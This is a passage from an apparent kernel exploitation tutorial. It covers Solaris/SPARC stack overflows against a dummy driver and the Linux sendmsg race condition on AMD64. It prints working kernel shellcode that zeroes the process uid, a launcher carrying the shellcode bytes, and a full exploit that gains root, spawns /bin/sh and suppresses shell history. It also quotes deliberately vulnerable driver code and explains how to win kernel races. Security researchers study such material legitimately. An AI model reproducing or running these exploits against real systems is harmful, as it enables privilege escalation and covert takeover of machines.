From the kthread_t struct the 'kernel stack address' is obtained [the
member is called t_stk]. This is good news, since that member is easily
accessible from within a shellcode (it's just a matter of correctly
accessing the %g7 / thread pointer). From now on we can follow the
sys_trap path and we'll be able to figure out what we will find on the
stack just after the kthread_t->t_stk value and where.

'STACK_BIAS' is then subtracted from that value : the 64-bit v9 SPARC ABI
specifies that the %fp and %sp registers are offset by a constant, the
stack bias, which is 2047 bytes. This is one thing that we have to
remember while writing our 'stack fixup' shellcode.
On kernels running in 32-bit mode the value of this constant is 0.
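
The bias is easy to get wrong by one step, so here is a minimal C sketch
of the conversion in both directions. The helper names are hypothetical
and the 16-byte alignment check reflects our reading of the V9 ABI, so
take it as an assumption rather than a statement about any given kernel.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_BIAS 2047u   /* 0x7ff, 64-bit SPARC V9 ABI; 0 on 32-bit */

/* Value to keep in %sp/%fp for a frame that really lives at 'frame'. */
static uint64_t bias_ptr(uint64_t frame)
{
        assert(frame >= STACK_BIAS);    /* avoid wrapping around zero */
        return frame - STACK_BIAS;
}

/* Real address of the save area a biased register value refers to. */
static uint64_t unbias_ptr(uint64_t reg)
{
        return reg + STACK_BIAS;
}

/* Non-zero if the frame is 16-byte aligned once the bias is removed. */
static int frame_is_aligned(uint64_t reg)
{
        return (unbias_ptr(reg) % 16u) == 0;
}
```

For example, a frame at 0x2a100497af0 has to be stored in %fp as
0x2a1004972f1, which is why biased register values always look 'odd'.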

The save that follows is more good news, because it means that we can use
the t_stk value as a %fp (along with the 'right return address') to return
at 'some valid point' inside the syscall path (and thus let it flow from
there and cleanly get back to userspace).

The question now is : at which point ? Do we have to 'hardcode' that
return address or can we somehow gather it ?

A further look at the syscall path reveals that :

        ENTRY_NP(utl0)
        SAVE_GLOBALS(%l7)
        SAVE_OUTS(%l7)
        mov     %l6, THREAD_REG
        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
        jmpl    %l3, %o7                        ! call trap handler
        mov     %l7, %o0

And %l3 is set here :

have_win:
        SYSTRAP_TRACE(%o1, %o2, %o3)


        !
        ! at this point we have a new window we can play in,
        ! and %g6 is the label we want done to bounce to
        !
        ! save needed current globals
        !
        mov     %g1, %l3        ! pc
        mov     %g2, %o1        ! arg #1
        mov     %g3, %o2        ! arg #2
        srlx    %g3, 32, %o3    ! pseudo arg #3
        srlx    %g2, 32, %o4    ! pseudo arg #4
 
%g1 was preserved since : 

#define SYSCALL(which)                  \
        TT_TRACE(trace_gen)             ;\
        set     (which), %g1            ;\
        ba,pt   %xcc, sys_trap          ;\
        sub     %g0, 1, %g4             ;\
        .align  32

and so it is syscall_trap for LP64 syscalls and syscall_trap32 for ILP32
syscalls. Let's check if the stack layout is the one we expect to find :

> ::ps ! grep snmp
R    291      1    291    291     0 0x00020008 0000030000db4060 snmpXdmid
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> ::ps ! grep snmpdx
R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
> 0000030000d2f488::print proc_t p_tlist
p_tlist = 0x30001dd4800
> 0x30001dd4800::print kthread_t t_stk
t_stk = 0x2a100497af0 ""
> 0x2a100497af0,16/K
0x2a100497af0:  1007374         2a100497ba0     30001dd2048     1038a3c
                1449e10         0               30001dd4800
                2a100497ba0     ffbff700        3               3a980
                0               3a980           0
                ffbff6a0        ff1525f0        0               0
                0               0               0
                0
> syscall_trap32=X
                1038a3c

  
Analyzing the 'stack frame' we see that the saved %l6 is exactly
THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
syscall_trap32 address. 
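
To make the reading of the dump explicit, the save area can be modelled
as a C struct. This is a sketch : the struct and helper names are
hypothetical, and the layout (eight locals followed by eight ins, 8 bytes
each) is the standard 64-bit register window save area as we understand
it. The values are the first 16 words of the mdb dump above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Save area of one 64-bit SPARC register window: 8 locals, then 8 ins. */
struct rwindow64 {
        uint64_t local[8];   /* %l0 .. %l7                              */
        uint64_t in[8];      /* %i0 .. %i7 (%i6 is %fp, %i7 the return) */
};

static_assert(sizeof(struct rwindow64) == 128, "16 x 8-byte registers");

/* Saved %l3: the handler address sys_trap was asked to call. */
static uint64_t saved_handler(const struct rwindow64 *w)
{
        return w->local[3];
}

/* Saved %l6: the thread pointer later moved into THREAD_REG (%g7). */
static uint64_t saved_thread(const struct rwindow64 *w)
{
        return w->local[6];
}

/* First 16 words of the dump taken at t_stk = 0x2a100497af0. */
static const struct rwindow64 mdb_dump = {
        { 0x1007374, 0x2a100497ba0ULL, 0x30001dd2048ULL, 0x1038a3c,
          0x1449e10, 0, 0x30001dd4800ULL, 0x2a100497ba0ULL },
        { 0xffbff700, 0x3, 0x3a980, 0, 0x3a980, 0, 0xffbff6a0, 0xff1525f0 },
};
```

The saved %l3 sits at byte offset 3 * 8 = 0x18 from t_stk, which is the
displacement a shellcode would have to use to read it back.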

At that point we're ready to write our 'shellcode' : 

# cat sparc_stack_fixup64.s

.globl begin
.globl end

begin:
        ldx [%g7+0x118], %l0
        ldx [%l0+0x20], %l1
        st %g0, [%l1 + 4]
        ldx [%g7+8], %fp
        ldx [%fp+0x18], %i7
        sub %fp,2047,%fp
        add 0xa8, %i7, %i7

        ret
        restore
end:
#

At this point it should be quite readable : it gets the t_procp address
from the kthread_t struct and from there it gets the p_cred addr.
It then sets to zero (the %g0 register is hardwired to zero) the cr_uid
member of the cred_t struct and uses the kthread_t->t_stk value to set
%fp. %fp is then dereferenced to get the 'syscall_trap32' address and the
STACK_BIAS subtraction is then performed.
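
The '+ 4' used in the store is the offset of cr_uid inside cred_t. A small
C mirror of the first members makes that visible. The struct name is
hypothetical, the member order is the one printed by mdb earlier, and we
assume every member is a 32-bit integer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Offsets the shellcode depends on, as printed by mdb on the test box. */
#define T_PROCP_OFF 0x118   /* offsetof(kthread_t, t_procp) */
#define P_CRED_OFF  0x20    /* offsetof(proc_t, p_cred)     */

/* Hypothetical mirror of the first cred_t members, all assumed 32-bit. */
struct cred_mirror {
        uint32_t cr_ref;    /* reference count    */
        uint32_t cr_uid;    /* effective user id  */
        uint32_t cr_gid;    /* effective group id */
        uint32_t cr_ruid;   /* real user id       */
        uint32_t cr_rgid;   /* real group id      */
        uint32_t cr_suid;   /* saved user id      */
        uint32_t cr_sgid;   /* saved group id     */
};

/* 'st %g0, [%l1 + 4]' only works if cr_uid sits right after cr_ref. */
static_assert(offsetof(struct cred_mirror, cr_uid) == 4, "cr_uid offset");

/* C equivalent of the single store performed by the shellcode. */
static void zero_euid(struct cred_mirror *c)
{
        c->cr_uid = 0;
}
```

Only the effective uid is touched; the remaining ids keep their values
until userland code changes them with the usual system calls.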

The add 0xa8 is the only hardcoded value, and it's the 'return place'
inside syscall_trap32. You can quickly derive it from a ::findstack dcmd
with mdb. A more advanced shellcode could avoid this 'hardcoded value' by
opcode scanning from the start of the syscall_trap32 function, looking
for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
window, and stays in the one sys_trap had created).
On all the boxes we tested it was always 0xa8, that's why we just left it
hardcoded.
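
The opcode scan mentioned above boils down to matching two 32-bit words.
The following C sketch shows the bit patterns involved; it works on a
plain array of instruction words, the function name is hypothetical, and
it is not the method used by the shellcode in this article (which keeps
the constant hardcoded).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define JMPL_O7_MASK  0xfff80000u  /* op, rd and op3 fields            */
#define JMPL_O7_BITS  0x9fc00000u  /* op=2, rd=%o7 (15), op3=0x38 jmpl */
#define SPARC_NOP     0x01000000u  /* sethi 0, %g0                     */

/*
 * Scan 'n' instruction words and return the byte offset of the first
 * 'jmpl <anything>, %o7' immediately followed by a nop, or -1 if none.
 */
static long find_jmpl_o7_nop(const uint32_t *text, size_t n)
{
        size_t i;

        assert(text != NULL);
        for (i = 0; i + 1 < n; i++) {
                if ((text[i] & JMPL_O7_MASK) == JMPL_O7_BITS &&
                    text[i + 1] == SPARC_NOP)
                        return (long)(i * sizeof(uint32_t));
        }
        return -1;
}
```

The returned value is the offset of the jmpl itself, which is what has to
end up in %i7, since 'ret' jumps to %i7 + 8.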

As we said, we need the shellcode to be on the command line, 'shifted'
by 3 bytes to obtain the correct alignment. To achieve that a simple
launcher code was used :

bash-2.05$ cat launcer_stack.c
#include <unistd.h>

char sc[] = "\x66\x66\x66"              // padding for alignment
"\xe0\x59\xe1\x18\xe2\x5c\x20\x20\xc0\x24\x60\x04\xfc\x59\xe0"
"\x08\xfe\x5f\xa0\x18\xbc\x27\xa7\xff\xbe\x07\xe0\xa8\x81"
"\xc7\xe0\x08\x81\xe8\x00\x00";

int main()
{
        execl("e", sc, NULL);
        return 0;
}
bash-2.05$

The shellcode is the one presented before. 

Before showing the exploit code, let's just paste the vulnerable code,
from the dummy driver provided for Solaris :

< stuff/drivers/solaris/test.c >

[...]

static int handle_stack (intptr_t arg)
{
        char buf[32];
        struct test_comunique t_c;

        ddi_copyin((void *)arg, &t_c, sizeof(struct test_comunique), 0);

        cmn_err(CE_CONT, "Requested to copy over buf %d bytes from %p\n",
                t_c.size, &buf);

        ddi_copyin((void *)t_c.addr, buf, t_c.size, 0); [1]

        return 0;
}

static int test_ioctl (dev_t dev, int cmd, intptr_t arg, int mode,
                        cred_t *cred_p, int *rval_p )
{
    cmn_err(CE_CONT, "ioctl called : cred %d %d\n", cred_p->cr_uid,
            cred_p->cr_gid);

    switch ( cmd )
    {
        case TEST_STACKOVF: {
                handle_stack(arg);
        }

[...]

< / > 

The vulnerability is quite self explanatory : t_c.size comes straight
from userland and is never checked against sizeof(buf) before the
ddi_copyin at [1] (a lack of 'input sanitizing').

Exploit follows :

< stuff/expl/solaris/e_stack.c >

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "test.h"

#define BUFSIZ 192

char buf[192];

typedef struct psinfo {
        int     pr_flag;        /* process flags */
        int     pr_nlwp;        /* number of lwps in process */
        pid_t   pr_pid;         /* unique process id */
        pid_t   pr_ppid;        /* process id of parent */
        pid_t   pr_pgid;        /* pid of process group leader */
        pid_t   pr_sid;         /* session id */
        uid_t   pr_uid;         /* real user id */
        uid_t   pr_euid;        /* effective user id */
        gid_t   pr_gid;         /* real group id */
        gid_t   pr_egid;        /* effective group id */
        uintptr_t pr_addr;      /* address of process */
        size_t  pr_size;        /* size of process image in Kbytes */
} psinfo_t;

#define ALIGNPAD        3

#define PSINFO_PATH     "/proc/self/psinfo"

unsigned long getaddr()
{
        psinfo_t        info;
        int             fd;

        fd = open(PSINFO_PATH, O_RDONLY);
        if ( fd == -1)
        {
                perror("open");
                return -1;
        }

        read(fd, (char *)&info, sizeof (info));
        close(fd);
        return info.pr_addr;
}
 

#define UPSARGS_OFFSET 0x330 + 0x161

int exploit_me()
{
        char    *argv[] = { "princess", NULL };
        char    *envp[] = { "TERM=vt100", "BASH_HISTORY=/dev/null",
                "HISTORY=/dev/null", "history=/dev/null",
                "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
                "HISTFILE=/dev/null", NULL };

         printf("Pleased to see you, my Princess\n");
         setreuid(0, 0);
         setregid(0, 0);
         execve("/bin/sh", argv, envp);
         exit(0);

}

#define SAFE_FP     0x0000000001800040 + 1
#define DUMMY_FILE  "/tmp/test"

int main()
{
        int                     fd;
        int                     ret;
        struct test_comunique   t;
        unsigned long           *pbuf, retaddr, p_addr;

        memset(buf, 'A', BUFSIZ);

        p_addr = getaddr();

        printf("[*] - Using proc_t addr : %p \n", p_addr);

        retaddr = p_addr + UPSARGS_OFFSET + ALIGNPAD;

        printf("[*] - Using ret addr : %p\n", retaddr);

        pbuf = &buf[32];

        pbuf += 2;

        /* locals */

        for ( ret = 0; ret < 14; ret++ )
                *pbuf++ = 0xBBBBBBBB + ret;
        *pbuf++ = SAFE_FP;
        *pbuf = retaddr - 8;

        t.size = sizeof(buf);
        t.addr = buf;

        fd = open(DUMMY_FILE, O_RDONLY);

        ret = ioctl(fd, 1, &t);
        printf("fun %d\n", ret);

        exploit_me();
        close(fd);

}
 
< / >

The exploit is quite simple (we apologize, but we didn't have a public one
to show at the time of writing) :

  - getaddr() uses procfs exported psinfo data to get the proc_t address
    of the running process.

  - the return addr is calculated from proc_t addr + the offset of the
    u_psargs array + the three needed bytes for alignment

  - SAFE_FP points just 'somewhere in the data segment' (and ready to be
    biased for the real dereference). Due to the SPARC window mechanism we
    have to provide a valid address that will be used to 'load' the
    saved procedure registers upon re-entering. We don't write to that
    address, so any readable kernel address is safe. (in more complex
    scenarios you might have to write there too, so take care).

  - /tmp/test is just a link to the /devices/pseudo/test@0:0 file

  - the exploit has to be compiled as a 32-bit executable, so that the
    syscall_trap32 offset is meaningful
  

You can compile and test the driver on your boxes, it's really simple. You
can extend it to test more scenarios, the skeleton is ready for it.


------[ 2.4 - A primer on logical bugs : race conditions


Heap and Stack Overflows (and, even more so, NULL pointer dereferences) are
seldom found on their own and, since automatic and human auditing work
goes on and on, they're going to become even rarer.
What will probably survive longer are 'logical bugs', which may lead, in
the end, to a classic overflow.
Coming up with a model of 'logical bugs' is, in our opinion, nearly
impossible : each one is a story of its own.
Notwithstanding this, one class of those is quite interesting (and
'widespread') and at least some basic approaches to it are suitable for a
generic description.

We're talking about 'race conditions'. 

In short, we have a race condition every time we have a small window of
time that we can use to subvert the operating system behaviour. A race
condition is usually the consequence of a forgotten lock or other
synchronization primitive, or of the use of a variable 'too long after'
the sanitizing of its value. Just point your favorite vuln database search
engine towards 'kernel race condition' and you'll find many different
examples.

Winning the race is our goal. This is easier on SMP systems, since the two
racing threads (the one following the 'raceable kernel path' and the other
competing to win the race) can be scheduled (and be bound) on different
CPUs. We just need to have the 'racing thread' go faster than the other
one, since they both can execute in parallel.
Winning a race on UP is harder : we have to force the first kernel path
to sleep (and thus to re-schedule). We also have to 'force' the scheduler
into selecting our 'racing' thread, so we have to take care of the
scheduling algorithm implementation (e.g. priority based). On a system
with a low CPU load this is generally easy to get : the racing thread is
usually 'spinning' on some condition and is likely the best candidate on
the runqueue.

We're now going to focus more on 'forcing' a kernel path to sleep,
analyzing the nowadays common interface to access files, the page cache.
After that we'll present the AMD64 architecture and show a real race
exploit for Linux on it, based on the sendmsg [5] vulnerability.
Winning the race in that case turns the vuln into a stack based one, so
the discussion will analyze stack based exploitation on Linux/AMD64 too.


---[ 2.4.1 - Forcing a kernel path to sleep 

  
If you want to win a race, what's better than slowing down your opponent?
And what's slower than accessing the hard disk, in a modern computer ?
Operating systems designers know that I/O over the disk is one of the
major bottlenecks for system performance and know as well that it is one
of the most frequently requested operations.

Disk access and Virtual Memory are closely tied : virtual memory needs
to access the disk to accomplish demand paging and in/out swapping, while
the filesystem based I/O (both direct read/write and memory mapping of
files) works in units of pages and relies on VM functions to perform the
write out of 'dirty' pages. Moreover, to significantly increase
performance, frequently accessed disk pages are kept in RAM, in the
so-called 'Page Cache'.

Since RAM isn't an inexhaustible resource, pages to be loaded and 'cached'
into it have to be carefully 'selected'. The first skimming is made by the
'Demand Paging' approach : a page is loaded from disk into memory only
when it is referenced, by the page fault handler code.
Once a filesystem page is loaded into memory, it enters the 'Page
Cache' and stays in memory for an unspecified time (depending on disk
activity and RAM availability; generally an LRU policy is used as the
eviction policy).
Since it's quite common for a userland application to repeatedly access
the same disk content/pages (or for different applications to access
common files), the 'Page Cache' significantly increases performance.

One last thing that we have to discuss is the filesystem 'page clustering'.
Another common principle in 'caching' is 'locality'. Pages near the
referenced one are likely to be accessed in the near future and, since
we're accessing the disk anyway, we can avoid the future seek-rotation
latency if we load in more pages after the referenced one. How many to
load is determined by the page cluster value.
On Linux that value is 3, so 2^3 pages are loaded after the referenced
one. On Solaris, if the pages are 8-kb sized, the next eight pages on a
64kb boundary are brought in by the seg_vn driver (mmap-case).
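
The numbers above translate into very little arithmetic. The C sketch
that follows is a rough model only : the helper names are hypothetical,
and treating a cluster as a naturally aligned power-of-two region is our
simplification of the Solaris behaviour described above, not a statement
about how either kernel implements read-ahead.

```c
#include <assert.h>
#include <stdint.h>

/* Pages read in per fault for a given log2 cluster value (Linux: 3). */
static unsigned cluster_pages(unsigned page_cluster)
{
        assert(page_cluster < 32);
        return 1u << page_cluster;
}

/* Start of the naturally aligned cluster that contains 'addr'. */
static uint64_t cluster_base(uint64_t addr, uint64_t cluster_bytes)
{
        /* cluster size must be a non-zero power of two */
        assert(cluster_bytes != 0 &&
               (cluster_bytes & (cluster_bytes - 1)) == 0);
        return addr & ~(cluster_bytes - 1);
}

/* Non-zero if both addresses fall inside the same cluster. */
static int same_cluster(uint64_t a, uint64_t b, uint64_t cluster_bytes)
{
        return cluster_base(a, cluster_bytes) ==
               cluster_base(b, cluster_bytes);
}
```

With 8 KB pages and eight pages per cluster the region is 64 KB wide, so
two addresses that differ only in their low 16 bits are brought in
together, while a page just past a 64 KB boundary is not.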

Putting it all together, if we want to force a kernel path to sleep we need
to make it reference an un-cached page, so that a 'fault' happens due to
the demand paging implementation. The page fault handler needs to perform
disk I/O, so the process is put to sleep and another one is selected by
the scheduler. Since we probably also want our 'controlled contents' to be
at the faulting address, we need to mmap the pages, modify them and then
exhaust the page cache before making the kernel access them again.

Filling the 'page cache' also has the effect of consuming a large quantity
of RAM and thus increasing the in/out swapping. On modern operating
systems one can't create a condition of memory pressure only by exhausting
the page cache (as was possible on very old implementations), since
only some amount of RAM is dedicated to the Page Cache and it would keep
on stealing pages from itself, leaving other subsystems free to perform
well. But we can manage to exhaust those subsystems as well, for example
by making the kernel do a large amount of 'surviving' slab-allocations.

Putting the VM under pressure is something to always keep in mind,
since, once that is done, one can manage to slow down the kernel
(favouring races) and make kmalloc or other allocation functions fail
(a thing that seldom happens under normal behaviour).

It is time, now, for another real life situation. We'll show the sendmsg
[5] vulnerability and exploiting code and we'll briefly describe the more
exploit-relevant details of the AMD64 architecture.
   

---[ 2.4.2 - AMD64 and race condition exploiting: sendmsg


AMD64 is the 64-bit 'extension' of the x86 architecture, which is natively
supported. It supports 64-bit registers, pointers/virtual addresses and
integer/logic operations. AMD64 has two primary modes of operation : 'Long
mode', which is the standard 64-bit one (32-bit and 16-bit binaries can
still be run with almost no performance impact, thanks to the
sometimes-called 'compatibility mode', or even, if recompiled, with some
benefit from the extended number of registers) and 'Legacy mode', for
32-bit operating systems, which is basically just like having a standard
x86 processor environment.

Even if we won't use all of them in the sendmsg exploit, we're now going
to sum up a couple of interesting features of the AMD64 architecture :

  - The number of general purpose registers has been extended from 8 up to
    16. The registers are all 64 bits long (referred to as 'r[name|num]',
    e.g. rax, r10). Just like what happened with the transition from
    16-bit to 32-bit, the lower 32 bits of the general purpose registers
    are accessible with the 'e' prefix (e.g. eax).

  - push/pop on the stack are 64-bit operations, so 8 bytes are
    pushed/popped each time. Pointers are 64-bit too and that allows a
    theoretical virtual address space of 2^64 bytes. As happens for the
    UltraSPARC architecture, current implementations address a limited
    virtual address space (2^48 bytes) and thus have a VA-hole (the least
    significant 48 bits are used and bits from 48 up to 63 must be copies
    of bit 47 : the hole is thus between 0x7FFFFFFFFFFF and
    0xFFFF800000000000).
    This limitation is strictly implementation-dependent, so any future
    implementation might take advantage of the full 2^64 bytes range.
 
  - It is now possible to reference data relative to the Instruction
    Pointer register (RIP). This is both good and bad news, since it
    makes writing position independent (shell)code easier, but it also
    makes position independent code in general more efficient (opening
    the way for better performing PIE-alike implementations)

  - The (in)famous NX bit (bit 63 of the page table entry) is implemented
    and so pages can be marked as No-Exec by the operating system. This is
    less of an issue than on UltraSPARC since currently there's no
    operating system which implements separated userspace/kernelspace
    addressing, thus leaving room for the use of the
    'return-to-userspace' technique.

  - AMD64 no longer supports (in 'long mode') the use of
    segmentation. This choice makes it harder, in our opinion, to create
    a separated user/kernel address space. However the FS and GS
    registers are still used for different purposes. As we'll see, the
    Linux Operating System keeps the GS register pointing to the 'current'
    PDA (Per Processor Data Structure). (check : /include/asm-x86_64/pda.h
    struct x8664_pda .. anyway we'll get back to that shortly).
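
The VA-hole rule from the list above (bits 48 to 63 must be copies of bit
47) is easy to express in C. This is a minimal sketch with a hypothetical
function name, assuming the 48-bit implementation described above.

```c
#include <assert.h>
#include <stdint.h>

#define VA_BITS 48   /* implemented virtual address bits, as described */

static_assert(VA_BITS >= 2 && VA_BITS <= 64, "sane VA width");

/* Non-zero if bits 63..(VA_BITS-1) of 'va' are all 0 or all 1. */
static int is_canonical(uint64_t va)
{
        uint64_t top  = va >> (VA_BITS - 1);
        uint64_t ones = (UINT64_C(1) << (64 - VA_BITS + 1)) - 1;

        return top == 0 || top == ones;
}
```

0x00007FFFFFFFFFFF and 0xFFFF800000000000 are the last and the first
valid addresses around the hole; everything in between is rejected.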


After this brief summary (if you want to learn more about the AMD64
architecture you can check the reference manuals at [3]) it is now time to
focus on the 'real vulnerability', the sendmsg [5] one :

"When we copy 32bit ->msg_control contents to kernel, we walk the
same userland data twice without sanity checks on the second pass.
Moreover, if original looks small enough, we end up copying to on-stack
array."
       
< linux-2.6.9/net/compat.c >

int cmsghdr_from_user_compat_to_kern(struct msghdr *kmsg,
                               unsigned char *stackbuf, int stackbuf_size)
{
        struct compat_cmsghdr __user *ucmsg;
        struct cmsghdr *kcmsg, *kcmsg_base;
        compat_size_t ucmlen;
        __kernel_size_t kcmlen, tmp;

        kcmlen = 0;
        kcmsg_base = kcmsg = (struct cmsghdr *)stackbuf;            [1]

[...]

        while(ucmsg != NULL) {
                if(get_user(ucmlen, &ucmsg->cmsg_len))              [2]
                        return -EFAULT;

                /* Catch bogons. */
                if(CMSG_COMPAT_ALIGN(ucmlen) <
                   CMSG_COMPAT_ALIGN(sizeof(struct compat_cmsghdr)))
                        return -EINVAL;
                if((unsigned long)(((char __user *)ucmsg -
                                    (char __user *)kmsg->msg_control)
                                   + ucmlen) > kmsg->msg_controllen) [3]
                        return -EINVAL;

                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmlen += tmp;                                       [4]
                ucmsg = cmsg_compat_nxthdr(kmsg, ucmsg, ucmlen);
        }

[...]

        if(kcmlen > stackbuf_size)                                   [5]
                kcmsg_base = kcmsg = kmalloc(kcmlen, GFP_KERNEL);

[...]

        while(ucmsg != NULL) {
                __get_user(ucmlen, &ucmsg->cmsg_len);                [6]
                tmp = ((ucmlen - CMSG_COMPAT_ALIGN(sizeof(*ucmsg))) +
                       CMSG_ALIGN(sizeof(struct cmsghdr)));
                kcmsg->cmsg_len = tmp;
                __get_user(kcmsg->cmsg_level, &ucmsg->cmsg_level);
                __get_user(kcmsg->cmsg_type, &ucmsg->cmsg_type);

                /* Copy over the data. */
                if(copy_from_user(CMSG_DATA(kcmsg),                  [7]
                                  CMSG_COMPAT_DATA(ucmsg),
                                  (ucmlen -
                                   CMSG_COMPAT_ALIGN(sizeof(*ucmsg)))))
                        goto out_free_efault;


< / >


As the advisory says, the vulnerability is a double reference to some
userland data (at [2] and at [6]) without sanitizing the value the second
time it is fetched from userland (the check at [3] is performed only on
the first fetch). That 'data' is the 'size' of the user-part to copy in
('ucmlen'), and it's used, at [7], inside the copy_from_user.

This is a pretty common scenario for a race condition : if we create two
different threads, make the first one enter the codepath and, after [4],
manage to put it to sleep and make the scheduler choose the other
thread, we can change the 'ucmlen' value and thus perform a 'buffer
overflow'.
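
The difference between the racy pattern and its fix can be modelled in
userland without any kernel code. In this sketch 'struct fake_user' is a
hypothetical stand-in for a user-controlled length that changes between
two reads, and the function names are ours. It only illustrates the
fetch-once principle and is not the patch that was applied to compat.c.

```c
#include <assert.h>
#include <stddef.h>

#define STACKBUF_SIZE 32

/* Simulated userland value: the second read returns something else. */
struct fake_user {
        size_t len;              /* value seen by the first fetch   */
        size_t len_after_check;  /* value seen by any later fetch   */
        int    reads;            /* number of fetches done so far   */
};

/* Stand-in for get_user(): every call re-reads 'userland' memory. */
static size_t fetch_len(struct fake_user *u)
{
        assert(u != NULL);
        return (u->reads++ == 0) ? u->len : u->len_after_check;
}

/* Racy: the checked value and the value used for the copy differ. */
static size_t racy_copy_len(struct fake_user *u)
{
        if (fetch_len(u) > STACKBUF_SIZE)   /* first fetch, checked    */
                return 0;
        return fetch_len(u);                /* second fetch, unchecked */
}

/* Fixed: fetch once, then check and use the same local copy. */
static size_t checked_copy_len(struct fake_user *u)
{
        size_t len = fetch_len(u);

        return (len > STACKBUF_SIZE) ? 0 : len;
}
```

With len = 16 and len_after_check = 4096 the racy variant ends up with a
copy length of 4096 for a 32-byte buffer, while the fixed one keeps 16.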

The kind of overflow we're going to perform is 'decided' at [5] : if the
len is small, the buffer used will be on the stack, otherwise it will be
kmalloc'ed. Both situations are exploitable, but we've chosen the stack
based one (we have already presented a slab exploit for the Linux
operating system before). Inside the exploit we're going to use the
technique presented in the previous subsection to force a process to
sleep, that is, making it access data across a page boundary (with the
second page never referenced before nor already swapped in by the page
clustering mechanism) :

+------------+ --------> 0x20020000 [MMAP_ADDR + 32 * PAGE_SIZE] [*]
|            |
| cmsg_len   |           first cmsg_len starts at 0x2001fff4
| cmsg_level |           first struct compat_cmsghdr
| cmsg_type  |
|------------| --------> 0x20020000 [cross page boundary]
| cmsg_len   |           second cmsg_len starts at 0x20020000
| cmsg_level |           second struct compat_cmsghdr
| cmsg_type  |
|            |
+------------+ --------> 0x20021000

[*] One of those so-called 'runtime adjustments'. The page clustering
    wasn't showing the expected behaviour in the first 32 mmaped pages,
    while it was working just as expected after them.
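
The addresses in the diagram follow from simple arithmetic, sketched here
in C. Two values are assumptions : 4 KB pages and MMAP_ADDR = 0x20000000,
which is what the boundary address in the diagram implies. The struct is
a hypothetical mirror of the 32-bit header (three 4-byte fields).

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE   0x1000u       /* 4 KB pages, assumed                */
#define MMAP_ADDR   0x20000000u   /* assumed: implied by the diagram    */
#define SKIP_PAGES  32u           /* pages skipped, see the note above  */

/* 32-bit control message header: three 4-byte fields, 12 bytes. */
struct compat_cmsghdr_mirror {
        uint32_t cmsg_len;
        int32_t  cmsg_level;
        int32_t  cmsg_type;
};

static_assert(sizeof(struct compat_cmsghdr_mirror) == 12, "header size");

/* Page boundary the two headers are laid across. */
static uint32_t boundary(void)
{
        return MMAP_ADDR + SKIP_PAGES * PAGE_SIZE;
}

/* The first header ends exactly at the boundary ... */
static uint32_t first_hdr(void)
{
        return boundary() - (uint32_t)sizeof(struct compat_cmsghdr_mirror);
}

/* ... so the second one begins on the first byte of the next page. */
static uint32_t second_hdr(void)
{
        return boundary();
}
```

The first header therefore starts at 0x2001fff4 and the second cmsg_len
is the very first word of a page that has not been touched yet.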


As we said, we're going to perform a stack-based exploitation, writing past
the 'stackbuf' variable. Let's see where we get it from :

< linux-2.6.9/net/socket.c > 

asmlinkage long sys_sendmsg(int fd, struct msghdr __user *msg,
                            unsigned flags)
{
        struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
        struct socket *sock;
        char address[MAX_SOCK_ADDR];
        struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
        unsigned char ctl[sizeof(struct cmsghdr) + 20];
        unsigned char *ctl_buf = ctl;
        struct msghdr msg_sys;
        int err, ctl_len, iov_size, total_len;
[...]

        if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
                err = cmsghdr_from_user_compat_to_kern(&msg_sys, ctl,
                                                       sizeof(ctl));

[...]

< / >

The situation is less nasty than it seems (at least on the systems we
tested the code on) : thanks to gcc reordering the stack variables we get
our 'msg_sys' struct placed as if it was the first variable.
That simplifies our exploiting task a lot, since we don't have to take
care of 'emulating' in userspace the structures referenced between our
overflow and the 'return' of the function (for example the struct sock).
Exploiting in this 'second case' would be slightly more complex, but
doable as well.

The shellcode for the exploit is not much different (as expected, since
AMD64 is a 'superset' of the x86 architecture) from the ones provided
before for the Linux/x86 environment; nevertheless we have to focus on two
important differences : the 'thread/task struct dereference' and the
'userspace context switch approach'.

For the first point, let's start analyzing the get_current()
implementation : 

< linux-2.6.9/include/asm-x86_64/current.h >

#include <asm/pda.h>

static inline struct task_struct *get_current(void)
{
        struct task_struct *t = read_pda(pcurrent);
        return t;
}

#define current get_current()

[...]

#define GET_CURRENT(reg) movq %gs:(pda_pcurrent),reg

< / > 

< linux-2.6.9/include/asm-x86_64/pda.h >

struct x8664_pda {
        struct task_struct *pcurrent;   /* Current process */
        unsigned long data_offset;      /* Per cpu data offset from linker
                                           address */
        struct x8664_pda *me;           /* Pointer to itself */
        unsigned long kernelstack;      /* top of kernel stack for current */
[...]

#define pda_from_op(op,field) ({ \
       typedef typeof_field(struct x8664_pda, field) T__; T__ ret__; \
       switch (sizeof_field(struct x8664_pda, field)) { \
case 2: \
asm volatile(op "w %%gs:%P1,%0":"=r" (ret__): \
             "i"(pda_offset(field)):"memory"); break;\
[...]

#define read_pda(field) pda_from_op("mov",field)
 
< / > 

The task_struct is thus no longer in the 'current stack' (more precisely,
referenced from the thread_info struct which is actually saved in the
'current stack'), but is stored in the 'struct x8664_pda'. This struct
keeps a lot of information about the 'current' process and the CPU it is
running on (kernel stack address, irq nesting counter, cpu it is running
on, number of NMIs on that cpu, etc).
As you can see from the 'pda_from_op' macro, during the execution of a
Kernel Path, the address of the 'struct x8664_pda' is reachable through
the %gs register. Moreover, the 'pcurrent' member (which is the one we're
actually interested in) is the first one, so obtaining it from inside a
shellcode is just a matter of doing a :

        movq %gs:0x0, %rax 

From that point on, the 'scanning' to locate uid/gid/etc is just the same
one used in the previously shown exploits.
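
Going back to the 'pcurrent is the first member' observation, here is a
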